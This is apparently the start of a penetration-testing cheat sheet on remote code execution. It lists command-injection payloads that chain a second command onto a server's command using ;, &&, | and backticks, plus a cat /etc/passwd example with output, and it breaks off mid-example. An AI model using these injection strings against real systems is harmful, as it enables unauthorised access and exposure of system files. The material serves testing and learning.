# Remote Code Execution Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server. ## Exploits Normal code execution, execute the command and voila :p ``` cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ``` Code execution by chaining commands ``` original_cmd_by_server; ls original_cmd_by_server && ls original_cmd_by_server | ls original_cmd_by_server `ls` ``` Code execution without space - Linux ``` swissky@crashlab:~/Www$ cat